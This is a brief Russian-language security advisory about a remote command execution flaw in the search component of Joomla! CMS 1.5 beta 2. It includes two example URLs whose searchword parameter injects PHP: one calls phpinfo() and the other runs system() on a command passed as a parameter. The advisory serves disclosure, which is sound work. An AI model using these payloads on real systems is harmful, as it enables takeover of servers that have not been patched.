Программа: Joomla! CMS 1.5 beta 2

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в компоненте «search». Удаленный пользователь может выполнить произвольные команды на целевой системе. 

Пример:

http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1

http://$joomlahost/index.php?c=id&searchword=" ;system($_GET[c]);%23&option=com_search&Itemid=1



Оставить мнение